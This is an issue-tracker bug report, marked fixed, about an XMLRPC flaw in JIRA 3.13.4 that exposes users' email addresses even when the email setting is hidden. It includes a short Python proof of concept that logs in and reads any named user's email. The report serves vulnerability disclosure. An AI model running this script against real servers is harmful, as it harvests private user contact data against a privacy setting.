XMLRPC information security leak

XMLWordPrintable

    • Type: Bug
    • Resolution: Fixed
    • Priority: High
    • 4.1
    • Affects Version/s: 3.13.4
    • Component/s: None
    • Environment:

      CentOS5.3 i386, JDK 1.6.0u16, standalone (in WANdisco JIRA multisite)

    • 3.13

      Server is set in public mode. The configuration option for email is set to hidden.
      The XMLRPC interface is enabled for authenticated users.

      It is trivial to find a users email.

      Concept python code follows:

      #!/usr/bin/python

      import xmlrpclib
      import sys

      s = xmlrpclib.ServerProxy('http://myhostname.fqdn/rpc/xmlrpc')
      auth = s.jira1.login('username', 'password')

      user = s.jira1.getUser(auth, sys.argv[1])
      print "Email address of " + sys.argv[1] + " is " + user['email']

        1. xmlrpc_email.zip
          1 kB
        2. RemoteUser.java.patch
          0.4 kB
        3. RemoteConfiguration.java.patch
          1 kB

              Assignee:
              Michael Tokar
              Reporter:
              Mark Keir
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

                Created:
                Updated:
                Resolved: